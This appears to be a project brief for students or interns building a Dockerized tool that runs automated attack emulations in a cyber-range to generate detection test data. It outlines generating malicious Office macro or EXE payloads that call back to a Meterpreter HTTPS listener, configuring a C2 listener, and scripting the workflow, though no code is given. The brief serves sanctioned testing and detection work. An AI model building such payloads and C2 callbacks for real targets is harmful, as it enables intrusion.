Background
Please read. Skip those that you already read or watched:
Outcomes
- Understand the motivation behind test automation with a Cyber-Range
- Reuse past students' (Wen Siang's Attack-Automation) works & extend for further attack emulations
- Learn how to package the work such that it is user-friendly for your "users" (like what I did with OEDR backend, it use to be a pain-in-the-ass to deploy). Use a docker container such that data-analytics team can easily deploy & use the container to run automated attack to generate data for their test-cases (I will handle the target-VMs within SandPIT, our C-Range).
Dockerized AutoTTP Deliverables
1. Payload generation
- should pass environment variables to docker container start up such that it knows the host IP address for payload to call back to
- Should preferably be Type 2 scripting (that office macro that spoof is good, you should extend n make it call back to meterpreter https listener), if really can't figure out, then EXE & we have to use detectOnly at the target-victim host.
2. C2 Listener Configuration
3. Automated Scripting
- You will need volume mapping much like how OpenEDR does it
- your entrypoint script in docker container will use env variable(s)
- generate payload & write to folder from volume mapping
- start C2 service listener & wait for payload call-backs